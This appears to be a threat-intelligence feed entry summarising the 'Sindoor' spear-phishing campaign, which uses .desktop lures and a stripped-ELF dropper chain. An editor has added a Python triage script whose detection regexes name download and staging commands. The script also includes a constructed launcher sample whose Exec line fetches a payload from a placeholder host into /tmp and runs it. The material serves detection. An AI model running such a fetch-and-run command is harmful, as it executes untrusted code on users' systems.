Sindoor Dropper: New Phishing Campaign
ID: b0e4b3db-7deb-508b-ad1e-d98cae80ee7c
STIX ID: report--b0e4b3db-7deb-508b-ad1e-d98cae80ee7c
Feed Name: Nextron Systems
This report analyzes a targeted spear-phishing campaign (Sindoor) against Indian organizations. The lure abuses Linux .desktop launcher files to run an obfuscated multi-stage dropper chain: UPX-packed Go binaries, ELF magic stripping and restoration, AES and DES decryption stages, and anti-VM checks. The chain ultimately installs a MeshAgent remote-access payload that connects to a documented C2 (wss://...indianbosssystems.ddns.net). The report provides full technical breakdowns, file hashes, YARA rules, decoded module routines, and recommended detection and mitigation artifacts, and links the tradecraft to APT36.
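Added example (the editor's, not code or YARA from the Nextron report): a small triage script for the two artifacts the summary names. It parses a .desktop launcher and flags Exec tradecraft of the kind described (shell chains, download/decode/staging primitives, document-style lure names), and it recognises an ELF whose `\x7fELF` magic has been stripped so a stage can restore it before execution. The sample launcher, the `example.invalid` URL, the regex heuristics and the machine list are constructed assumptions for illustration, not indicators from the report.

```python
"""Triage helpers for a malicious .desktop launcher and a stripped-magic ELF.
Heuristics and samples here are the editor's assumptions, not report IOCs."""
import re
import struct

# Assumption: Exec= patterns a document-looking launcher should never carry.
SHELL_CHAIN = re.compile(r"\b(?:ba)?sh\s+-c\b|\|\s*(?:ba)?sh\b", re.IGNORECASE)
STAGING = re.compile(
    r"\b(?:curl|wget)\b|base64\s+-d|chmod\s+\+x|/tmp/|/dev/shm/|\bnohup\b",
    re.IGNORECASE,
)
DOC_NAME = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)
DOC_ICONS = {"application-pdf", "x-office-document"}


def parse_desktop(text: str) -> dict:
    """Minimal parser for the [Desktop Entry] group of a freedesktop .desktop file."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def desktop_findings(text: str) -> list:
    """Return the list of heuristic hits for one .desktop file (empty if clean)."""
    e = parse_desktop(text)
    exec_line = e.get("Exec", "")
    findings = []
    if SHELL_CHAIN.search(exec_line):
        findings.append("shell-chain")          # Exec hands a script to a shell
    if STAGING.search(exec_line):
        findings.append("download-or-decode")   # fetch/decode/stage in temp dirs
    if DOC_NAME.search(e.get("Name", "")) or e.get("Icon", "") in DOC_ICONS:
        findings.append("document-lure")        # launcher masquerades as a document
    return findings


ELF_MAGIC = b"\x7fELF"
# Assumption: architectures worth flagging; extend for your fleet.
KNOWN_MACHINES = {0x03, 0x3E, 0x28, 0xB7}  # x86, x86-64, ARM, AArch64


def classify_elf(buf: bytes) -> str:
    """Return 'elf', 'stripped-elf' or 'other'.

    A dropper that zeroes the first four bytes still leaves a plausible e_ident
    (class, data, version) and a sane e_type/e_machine at offset 16, which is
    enough to recognise the file without its signature."""
    if len(buf) < 20:
        return "other"
    if buf[:4] == ELF_MAGIC:
        return "elf"
    ei_class, ei_data, ei_version = buf[4], buf[5], buf[6]
    if ei_class not in (1, 2) or ei_data not in (1, 2) or ei_version != 1:
        return "other"
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", buf[16:20])
    if e_type in (2, 3) and e_machine in KNOWN_MACHINES:   # ET_EXEC / ET_DYN
        return "stripped-elf"
    return "other"


def restore_elf_magic(buf: bytes) -> bytes:
    """Put the magic back so the payload can be handed to normal ELF tooling."""
    if classify_elf(buf) != "stripped-elf":
        raise ValueError("buffer does not look like an ELF with stripped magic")
    return ELF_MAGIC + buf[4:]


# Constructed samples (not from the report).
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Circular.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/s1 -o /tmp/.s1; chmod +x /tmp/.s1; nohup /tmp/.s1 &"
"""
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""
# Minimal 64-byte ELF64 little-endian header (ET_EXEC, x86-64), then its stripped twin.
SAMPLE_ELF = (b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
              + struct.pack("<HHI", 2, 0x3E, 1) + b"\x00" * 40)
STRIPPED_ELF = b"\x00" * 4 + SAMPLE_ELF[4:]

if __name__ == "__main__":
    print(desktop_findings(MALICIOUS_DESKTOP), desktop_findings(BENIGN_DESKTOP))
    print(classify_elf(SAMPLE_ELF), classify_elf(STRIPPED_ELF),
          restore_elf_magic(STRIPPED_ELF) == SAMPLE_ELF)
```

Run it over `~/.local/share/applications/*.desktop`, `~/Desktop/*.desktop` and any launchers found in mail attachment directories; the ELF check is worth pointing at unexplained files under `/tmp` and `/dev/shm`, since that is where a dropper typically writes the stage whose magic it restores at runtime.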
